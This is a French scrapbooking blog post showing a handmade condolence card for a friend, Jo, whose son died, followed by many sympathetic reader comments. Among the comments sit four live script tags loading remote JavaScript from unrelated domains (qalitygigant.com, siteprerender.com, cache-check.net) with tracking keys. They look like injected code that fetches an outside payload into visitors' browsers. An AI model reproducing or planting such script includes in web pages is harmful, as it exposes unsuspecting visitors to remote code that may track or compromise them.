• Carte de Condoléances

     

     

    Carte de Condoléances

     

    ( A Retrouver dans la Rubrique "Loisirs"-"Scrapbooking"-"Carte Condoléances" ICI  )

    ( Décliné en "Tendres Pensées" à Retrouver dans la Rubrique "Condoléances" ICI )

     

     

     

    Parce que la Vie parfois nous offre des épreuves si difficiles à surmonter, il faut qu'elle offre des Ami(e)s pour soutenir ceux qui les subissent....

    Pour Jo...

     

     

    Carte de Condoléances

     

     

     

     

     

    Carte de Condoléances

     

     

     

     

     

    Carte de Condoléances

     

     

     

     

    Message pris sur le blog de Jo....

     

     

    Carte de Condoléances

     

    Carte de Condoléances

     

     

     

     

    Carte de Condoléances

     

    ( A Retrouver dans la Rubrique "Séparations" "Divers" ICI )

     

     

     

     

    Carte de Condoléances

     

     

     

     

    Carte de Condoléances

     

    ( A Retrouver dans la Rubrique "Jours"-"Dimanche"-"Printemps" ICI )

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    29
    Mercredi 30 Septembre 2020 à 16:25
    dane

    coucou une carte très jolie malgrè la tristesse que cela nous fais supporter bravo a toi j' irais sur le blog de jo 

    28
    qinoa
    Mercredi 23 Septembre 2020 à 12:09

    une carte tout en douceur, comme tu sais si bien les faire.

    bzz et douce journée

    27
    Lundi 21 Septembre 2020 à 15:55

    Une carte comme on aime pas à devoir faire, encore moins à recevoir et qui pourtant fait tellement de bien !
    Jolies pensées et élégamment amenées ! Bravo pour cette délicate attention

    Gros Bisous

     

    26
    Lundi 21 Septembre 2020 à 15:15

    Voilà des sentiments qui ne sont jamais faciles à exprimer ;

    Bonne semaine ; bisous / Nicole

    25
    Lundi 21 Septembre 2020 à 06:58

    Ta magnifique carte avec ce Bouddha a été faite avec amour et apportera, j'en suis sure, un peu de paix à la famille de Christophe.

    Bisous bisous !

    24
    Lundi 21 Septembre 2020 à 00:40

    Tu as su traduire ce que Christophe aimait à travers ta carte de condoléances. Quelle grande tristesse pour JO et tous les siens...

    23
    Dimanche 20 Septembre 2020 à 20:50

    Coucou Valie.

    Une pensée pour ton amie dans ces moments difficiles.

    Ta carte est magnifique .

    Bisous

    22
    Dimanche 20 Septembre 2020 à 19:25

    Une carte qui va faire plaisir et remonter le moral de Jo.

    Bonne soirée.
    Bises.

     

    21
    Dimanche 20 Septembre 2020 à 17:42

    bonjour Valie. une pensée pour notre amie JO. qu'elle tristesse de perdre son fils. tu as réalisée une très belle carte j'espère que cela la réconforteras une peu. bonne soirée bisous liliane

    20
    Dimanche 20 Septembre 2020 à 17:36

    Toutes mes sympathies à ton amie Jo et à ses proches. Un grand merci pour ces jolies cartes. Passe une belle fin de journée, bisou rose tendresse !

    19
    Dimanche 20 Septembre 2020 à 17:18

    Cc ma tite Valie, quelle tristesse. 

    Je ne connais pas ton Amie Jo mais je partage très sincèrement sa peine & sa douleur & celle de ses proches.

    Rien n'est pire que la perte d'un enfant, pour l'avoir vécu moi même, on n'en guéri jamais... 

    Ta carte va leur apporter Douceur & Réconfort sois en certaine.

    Doux Bisous affectueux à Jo

    & à toi aussi ma tite Valie.

    18
    Tite-C.
    Dimanche 20 Septembre 2020 à 17:04

    Quel beau fond d'automne!  Bonne journée douce Valie.

    17
    Dimanche 20 Septembre 2020 à 16:34

    je ne connais pas jo mais ta carte va certainement la touchée 

    bisous bonne soirée 

    16
    Dimanche 20 Septembre 2020 à 15:21

    Bonjour ma douce Valie

    Tu es quelqu'un de formidable tu penses à tout le monde , mes sincères condoléances pour cette famille dans le deuil d'un enfant il n'y a rien de pire !

    gros bisous

    Janine

    15
    mamijojo77100
    Dimanche 20 Septembre 2020 à 15:20

    tres jolie realisation pour notre amie jo. Que toutes nos pensees lui permettent de remonter la pente ce qui ne va pas etre facile..Bonne fin d apres midi BIZZZZ   joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1600607875296" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    14
    Dimanche 20 Septembre 2020 à 13:14

    Très sympathique carte et j'aime beaucoup ton image avec ce que ça représente pour Jo et son fils. 

    Bises

    thaly

    13
    Dimanche 20 Septembre 2020 à 12:02

    Très belle ta carte pour Jo pour ces moments douloureux!! Je pense très fort à elle......

    Bisous et doux dimanche

    12
    Dimanche 20 Septembre 2020 à 11:46

    ce sont des cartes que nous aimerions ne pas faire, mais la vie est ainsi faites

    ta carte est magnifique toutes douces  j aime beaucoup

    bisous

    11
    Dimanche 20 Septembre 2020 à 11:12
    lamanuelle25

    Très belle malgré ce thème douloureux! Bises Nadine

    10
    Jeannine (cristal24)
    Dimanche 20 Septembre 2020 à 10:56

    Très jolie carte qui, j'espère essayera de remonter un peu le moral de Jo, lorsqu'elle verra qu'on pense à elle.

    Bon dimanche.  Bises.

    Jeannine

    9
    Elisabeth Marteen
    Dimanche 20 Septembre 2020 à 10:51
    C'est une jolie carte de réconfort pour Jo.
    Gros bisous, bonne journée.
    8
    marianne pirotte
    Dimanche 20 Septembre 2020 à 10:46

    Une très jolie carte pour Jo, je suis de tout coeur avec elle !!

    Gros bisous

    Marianne

    7
    Dimanche 20 Septembre 2020 à 10:41

     une  carte peine d'ondes  positives  pour  ton amie   bravo!!

    gros  bisous

     

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    6
    Jacline-H-49
    Dimanche 20 Septembre 2020 à 10:35

    bjr ma Valie,

    une jolie carte qui représente bien ce qu'aimait le fils de Jo, souhaitons que son voeux pour ses cendres, soit réalisé. Condoléances à toute la famille.

    Le ciel est triste lui aussi pour ce matin en tout cas.

    Passe un bon dimanche dans ta petite entreprise, à l'abri des intempéries.

    Mes pensées vont aussi aux habitants de l'Hérault et du Gard.

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    5
    Jour de Mai
    Dimanche 20 Septembre 2020 à 09:57

    Coucou Valie, 

    Cette pensée représentée sur cette magnifique carte est un très bel hommage au fils de Jo a qui je présente toutes mes condoléances et quel beau geste de la part de ses parents de répondre à son souhait. Ce n'est pas chose aisée et même si la présence n'est pas là, il le sera toujours dans vos coeurs.

    Courage à Jo. 

    Excellent dimanche à toi Valie ainsi qu'aux tiens. 

    De très gros bisous ♥♥♥

    LN

     

    4
    Dimanche 20 Septembre 2020 à 09:53

    Belle initiative de ta part pour soutenir Jo pendant cette période très douloureuse pour elle

    Sincères condoléances à elle et toute sa famille

    Bisous

    3
    Dimanche 20 Septembre 2020 à 09:46

    superbe cette carte de condoléances

    j'espère que son souhait sera réalisé...

    bisous

    2
    Dimanche 20 Septembre 2020 à 09:26

    Comme c est triste ma Valie je sais tellement ce qu est perdre des enfants je la soutient de tout mon coeur, et quelle belle idée de répandre ses cendres dans ce magnifique fleuve qu est le Gange que je connais si bien ayant été en Inde il y a longtemps de cela mais un pays plein de ferveur et de douceur 

    Bisous tendresse ma douce je vais au pot 

    1
    Dimanche 20 Septembre 2020 à 09:17

    Bonjour ma Valie.......Avoir une belle pensée pour ton amie, tu as réalisé une très belle carte  pour son fils disparu ....Je lui présente mes sincères condoléances à elle et toute sa famille

    Bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :